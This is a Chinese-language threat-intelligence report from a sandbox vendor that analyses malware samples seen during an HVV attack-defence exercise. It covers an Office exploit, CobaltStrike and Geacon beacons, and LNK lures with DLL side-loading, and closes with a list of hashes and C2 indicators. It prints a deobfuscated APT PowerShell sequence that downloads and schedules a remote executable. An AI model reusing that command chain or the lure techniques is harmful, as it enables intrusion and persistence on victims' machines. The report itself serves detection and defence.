【天穹】HVV专题:典型HVV样本总结与IOC收集(第二期)

一、概述

转眼间,HVV行动已经进行两周了,奇安信天穹沙箱持续为用户提供数据安全保障。本期就分析人员对近两周用户提交HVV样本的分析总结,与大家一起分享我们的新发现:

1、样本中出现了使用Geacon项目编译的变种CobaltStrike木马,Geacon是一个旨在使用Go实现CobaltStrike Beacon的开源项目,除了Geacon外,还诞生了改进版的Geacon_PlusGeacon_Pro

2、白加黑样本数量显著上升,压缩包样本尤其喜欢利用该技术;

3、在7月20日到8月1日期间,天穹沙箱总计提取到1900+条CobaltStrike Beacon/Stager威胁配置信息,进一步证明CobaltStrike在HVV样本中占比依旧偏重;

4、使用Go和Rust编写的样本数量明显增多,部分样本使用garblego-strip对Go样本混淆,极大地增加了人工分析难度。

除分析典型样本外,我们还在文末附上了一批高价值HVV样本IOC福利,欢迎大家查阅。

天穹沙箱温馨提示: 如果收到可疑文件或链接,可先投递到天穹沙箱进行分析,避免直接点击造成安全危害。在使用过程中发现任何问题,欢迎随时向我们反馈。

二、典型样本分析

1、漏洞利用

  • 样本名:Re_ Compr_Comprobante de pago.xlam
  • SHA1:95b33d7f3636a4dcd1ffab18473ab1ee133130fa
  • 文件类型:XLAM
  • 漏洞信息:CVE-2017-11882
  • C2:1
http[:]//192.3.101.141/newconstraints.vbs
  • 报告链接:天穹沙箱分析报告
  • 描述:CVE-2017-11882是一个经典的栈溢出漏洞,成因是公式编辑器EQNEDT32.EXE读入包含MathType的OLE数据,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出。尽管历史悠久,该漏洞仍被广泛利用,如果使用的Office版本较低,仍可能中招。

2、变种CobaltStrike

  • 样本名:***简历.exe
  • SHA1:6cb9bc9465a77db724f3eadfb8eff9e5267aa56a
  • 文件类型:EXE
  • 样本家族:Geacon
  • C2:1
101.36.112.140[:]9001
  • 报告链接:天穹沙箱分析报告
  • 描述:使用Geacon框架编译的变种Beacon木马在之前的HVV行动中也有红队使用,该项目使用Go语言编写,支持跨平台编译,可生成在Windows、Linux、macOS等多个平台上运行的可执行文件。天穹沙箱已针对Geacon及其变种适配提取关键数据能力,可提取威胁配置信息。
  • 威胁配置信息:
图1 Geacon威胁配置信息

3、压缩包

3.1 样本一

  • 样本名: **金融业务部招聘**_福利.zip
  • SHA1: 9710c889f9a2ae172d9120db816124f8b75106f6
  • 文件类型:ZIP
  • 样本家族:CobaltStrike
  • C2:
【真实C2】
https[:]//58.215.157.242/v4/static/v1.7.9/gcaptcha4.js
https[:]//58.220.82.214/v4/static/v1.7.9/gcaptcha4.js
https[:]//58.222.47.208/v4/static/v1.7.9/gcaptcha4.js
https[:]//58.215.155.223/v4/static/v1.7.9/gcaptcha4.js
https[:]//58.222.47.210/v4/static/v1.7.9/gcaptcha4.js
https[:]//220.185.164.225/v4/static/v1.7.9/gcaptcha4.js

【HOST伪装】
https[:]//vangogh.bytedance.com/v4/static/v1.7.9/gcaptcha4.js
https[:]//passport.bytedance.com/v4/static/v1.7.9/gcaptcha4.js
https[:]//learning.bytedance.com/v4/static/v1.7.9/gcaptcha4.js
https[:]//news.163.com/v4/static/v1.7.9/gcaptcha4.js
https[:]//staos.microsoft.com/v4/static/v1.7.9/gcaptcha4.js
  • 报告链接:天穹沙箱分析报告
  • 描述:该样本是一个典型的HVV压缩包样本,利用了多种手段诱骗用户点击:
    • 压缩包命名为某大型互联网公司的招聘福利,诱骗用户解压;
    • 压缩包内包含两个LNK文件,后缀名为.docx.lnk,图标指向文档,在Windows资源管理器中,.lnk后缀默认不显示,很容易误导用户这是一个docx文档;
    • 当用户双击任意一个LNK文件后,就会运行隐藏在嵌套目录__MACOS__下的a*****a.com文件,该文件实际是一个x64 exe文件,在Windows下.com后缀可以直接执行,同时该文件又是一个有合法签名的白文件,但未做DLL签名校验,因此它加载的PROPSYS.dll可以被劫持,这是一个典型的DLL侧加载
    • a*****a.com运行后会加载同级目录的PROPSYS.dll,该DLL会加载Shellcode,完成CobaltStrike上线。
  • 威胁配置信息(仅提取到伪装后的Host):
图2 CobaltStrike威胁配置信息

3.2 样本二

  • 样本名:APP实名报错录像.zip
  • SHA1:c174e2ba90ed5ffa69558702f1872bdfd7929e52
  • 文件类型:ZIP
  • 样本家族:CobaltStrike
  • C2:
https[:]//47.103.87.12/ptj
  • 报告链接:天穹沙箱分析报告
  • 描述:该样本与上文提到的样本攻击手法几乎完全一致,同样是利用了LNK、DLL侧加载和__MACOS__目录隐藏可执行文件等手段完成CobaltStrike上线,大概率是同一作者制作。样本分析过程中,我们发现作者在制作LNK文件时出现了疏漏,忘记抹去机器标识符等信息,所以可以通过这些信息溯源:

APP实名报错录像截图.pdf.lnk机器码等信息:

机器标识符: laptop-vtvll06r
机器标识符(原始数据): 6c 61 70 74 6f 70 2d 76 74 76 6c 6c 30 36 72 00
Droid Volume Identifier: 0878038E-185F-4051-8202-5C6E4A306D3C
Droid File Identifier: B5571CDB-0C35-11EF-8540-DA77BD3D2A17
Birth Droid Volume Identifier: 0878038E-185F-4051-8202-5C6E4A306D3C
Birth File Volume Identifier: B5571CDB-0C35-11EF-8540-DA77BD3D2A17

金融业务部招聘_福利.docx.lnk机器码等信息:

机器标识符: laptop-6n6urief
机器标识符(原始数据): 6c 61 70 74 6f 70 2d 36 6e 36 75 72 69 65 66 00
Droid Volume Identifier: 0878038E-185F-4051-8202-5C6E4A306D3C
Droid File Identifier: 96E48F4F-49BA-11EF-8539-AC74B114B9FE
Birth Droid Volume Identifier: 0878038E-185F-4051-8202-5C6E4A306D3C
Birth File Volume Identifier: 96E48F4F-49BA-11EF-8539-AC74B114B9FE

两个LNK的机器码均以laptop-开头,且Droid Volume Identifier字段相同,考虑到攻击方式如此接近,推测是同一攻击者制作。

  • 威胁配置信息:
图3 CobaltStrike威胁配置信息

4、恶意快捷方式

4.1 样本一

  • 样本名:Screenshot_29_07_2024_11_02_03.lnk
  • SHA1:76a9126abf1a740f121ec01698b5749bdde8b2bc
  • 文件类型:LNK
  • C2:
45.61.139.69[:]80
  • 报告链接:天穹沙箱分析报告
  • 描述:该样本通过cmd执行恶意命令后释放了一个名为ie4uinit.exe的恶意可执行文件,然后执行该恶意文件连接C2以执行更多恶意行为。

4.2 样本二

  • 样本名:*****_Technology_Innovation.lnk
  • SHA1:00faa7a56f512ff8bfad1b5fafa74ee02c771b58
  • 文件类型:LNK
  • C2:
xingyu.ghshijie.com
yuxuan.ghshijie.com
https[:]//xingyu.ghshijie.com/cvbcolo09/tqerwer8
https[:]//yuxuan.ghshijie.com/jlytw07sev/fuol91mv
  • 报告链接:天穹沙箱分析报告
  • 描述:该样本实际是肚脑虫(Donot)APT组织在HVV期间投递的恶意快捷方式,通过LNK命令行参数执行恶意PS1命令,使用TQGPT对PS1命令解混淆后结果如下:
# 设置下载文件时不显示进度条
$ProgressPreference = 'SilentlyContinue';

# 从指定URL下载PDF文件到C:\Users\Public目录下
Invoke-WebRequest https://xingyu.ghshijie.com/cvbcolo09/tqerwer8 -OutFile 'C:\Users\Public\*****_Technology_Innovation.pdf';

# 打开下载的PDF文件
Start-Process 'C:\Users\Public\*****_Technology_Innovation.pdf';

# 从另一个URL下载一个文件到C:\Users\Public目录下,文件名为sam
Invoke-WebRequest https://Yuxuan.ghshijie.com/jlytw07sev/fuol91mv -OutFile 'C:\Users\Public\sam';

# 将下载的文件重命名为Update.exe
Rename-Item -Path 'C:\Users\Public\sam' -NewName 'C:\Users\Public\Update.exe';

# 复制PDF文件到当前目录
Copy-Item 'C:\Users\Public\*****_Technology_Innovation.pdf' -Destination .;

# 创建一个名为TaskReportingUpdate的计划任务,该任务每分钟运行一次Update.exe
schtasks /Create /SC MINUTE /TN TaskReportingUpdate /TR "C:\Users\Public\Update";

# 尝试删除所有名称以.f.n结尾的文件,但这里使用的通配符格式是非标准的,可能不起作用
Remove-Item *.?f.?n?
  • 由解混淆后的命令可以看出,该样本会下载一个PDF并打开该文件,随后下载一个EXE文件,并将EXE设置为计划任务,每分钟运行一次,然后清除痕迹。许多APT组织会在HVV期间浑水摸鱼,提醒各位一定不要掉以轻心,谨防造成不可挽回的损失。

三、IOC福利

除了以上典型样本外,我们还为各位读者附上一批高价值HVV样本IOC名单:

样本名Drv64.exe
MD5ed248b880f0a90736365f80e07af828e
C2https[:]//1o88.oss-cn-hangzhou.aliyuncs.com/i.dat
样本名setup附件6029-1.exe
MD5ad3df703fe84be085ff6662fe989c6b7
C2https[:]//baidu77-1326101028.cos.ap-hongkong.myqcloud.com/77.png
样本名1.exe
MD5c8564d787012f97a20fd723ac283a59d
C2https[:]//39.104.205.159/api/v1/teams/spring-framework/pipelines
样本名SpSc_se.exe
MD5347ee0d5dee22382bf2020de538ad2a4
C2http[:]//192.168.47.128/MjYM
样本名模板规格明细.exe
MD5655fee4f7f402eeedae08ca6f6545a51
C2https[:]//wwwasdasdqfweqwe45-1326536100.cos.ap-chongqing.myqcloud.com/45.txt
样本名票**********助手.exe
MD5613e87babd878e561f89d679f351a3f1
C2https[:]//fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1721279610811/xuan.txt
样本名apache.exe
MD5474f55685d62720ee40f0810dff59c09
C2https[:]//apibaidu-cjklerlcfx.cn-hangzhou.fcapp.run/jquery-3.3.10.min.js
样本名个人微信(2).exe
MD5359879c68712574651f14279ef3834cf
C2https[:]//107.172.191.175/uTAS
样本名Viz_Setup.U3.11.exe
MD5b5fe2fcc7efc4b39d646a21da22f6593
C2https[:]//o30.oss-cn-beijing.aliyuncs.com/i.dat
样本名SynTPLpr.exe
MD5873d734941f7b6128755dce770e3752b
C2https[:]//42o.oss-cn-beijing.aliyuncs.com/i.dat
样本名wlanext.exe
MD5c0783e30a0667375bbdc32f34698fea9
C221hjgt71f.sharedomain.top
样本名9999.exe
MD56b31a365aa150ee29240045044ddb92c
C2https[:]//82.157.177.73/wp08/wp-includes/dtcla.php
样本名****行情交易系统.exe
MD5cb49d2813b0cb4f78fc39152baf58d4f
C2https[:]//wpurl.wpqh.cc/fzxdy/trade_pobo.txt
样本名02-升级工具.exe
MD5c858596ac28b6c281cc6a5fd3e797928
C2xred.mooo.com
样本名****采购平台数字签名服务补丁升级包安装说明.exe
MD50950d8bba59da75d88bf5a77d4f2fd82
C2https[:]//62.234.31.47/center/user_sid
样本名****有限公司2024年Q1****大屏业务攻坚活动执行服务后续问题反馈.exe
MD5fc6aea2d4740c5217eace9b4236d3b4f
C2https[:]//152.136.166.138/HfJ989Sh
样本名**-****大学-本科-机械专业-个人简历及其他材料.exe
MD5c38e7ecc2313c104aa11cb312687bed9
C2175.178.3.223[:]80
样本名点击查看.exe
MD51d6f066b28830b3bc2d83056ead4da14
C2https[:]//omss.oss-cn-hangzhou.aliyuncs.com/f.dat
样本名Setup-2024.exe
MD5fa22cb60e3ac3ec4495722966e222123
C2154.91.64.9[:]8080
样本名GPU环境检测10.01.07.exe
MD56f6f5d55e407ca4ce7930dfa270f23c5
C22024oe.uf1o.com
样本名公司6月工资清单&c.exe
MD5055d43e0c8195c2b47a3e898ffc653c1
C2https[:]//jerryojbksaaaaaa.oss-cn-beijing.aliyuncs.com/c.txt
样本名vcredist2008_x64.exe
MD5a8aad42c597878cf18e5b8ad342c8429
C2xred.mooo.com
样本名******小额贷款方案汇总文档(1)2.exe
MD526f47e1c677927db673dd2892739a9c3
C2https[:]//124.225.127.200/static/vendor.5398c8aa.js
样本名hosts.1.x64.exe
MD5b0a4afbf62c6313549d7487200eb7ee3
C2https[:]//www.cainiao.com/mp/getapp/msgext
样本名****护网蓝队简历.exe
MD537879819a198524c6922699063599fef
C2http[:]//1.92.121.46/match
样本名举报材料.docx.exe
MD575d8097b47bfa9e021c71b4a34f80b91
C2101.42.6.230[:]8085
样本名****专利(**)涉嫌侵权通告文件.exe
MD581154dffd744704da6a06c9aece03123
C2https[:]//39.104.16.206/dist/css/bootstrap.min.css
样本名SASAC-中央企业科技创新成果产品手册(2024年版)文档已加密-2024073109389.zip
MD594cbd01a9ad1fc0d0c8bc5eb9af7ed87
C2https[:]//www.512ks.cn/Discord.1.2.js
https[:]//www.dnf404.com/Discord.1.2.js
https[:]//www.333.cc/Discord.1.2.js
https[:]//www.sdzy.com/Discord.1.2.js
https[:]//www.68y.com/Discord.1.2.js
https[:]//61.170.88.203/Discord.1.2.js
https[:]//116.136.171.154/Discord.1.2.js
https[:]//111.123.250.73/Discord.1.2.js
样本名Game_Cloner.exe
MD5c2b7718e40578cfb1b0fbd1ce4825840
C2https[:]//github.com/lcm2080/sssssttoooorrre22/raw/main/BUILT%20(2).exe
样本名****(柬埔寨)暑期999全家游.iso
MD54b71072368246193c9b2f2a7f101b6ff
C2123.56.128.253[:]80

四、技术支持与反馈

星图实验室深耕沙箱分析技术多年,致力于让沙箱更好用、更智能。做地表最强的动态分析沙箱,为每个样本分析人员提供便捷易用的分析工具,始终是我们最求的目标。各位同学在使用过程中有任何问题,欢迎联系我们。

天穹沙箱支持模拟14种CPU架构的虚拟机,环境数量50+,全面覆盖PC、服务器、智能终端、IoT设备的主流设备架构形态。在宿主机方面,除了Intel/AMD的x86架构CPU和CentOS操作系统之外,天穹沙箱支持海光、飞腾、鲲鹏等x86、ARM架构国产CPU和银河麒麟、中科方德等信创操作系统。

天穹沙箱系统以云沙箱、引擎输出、数据接口等多种形式服务于公司各个业务部门,包括天眼、终端安全、态势感知、ICG、锡安平台、安服等。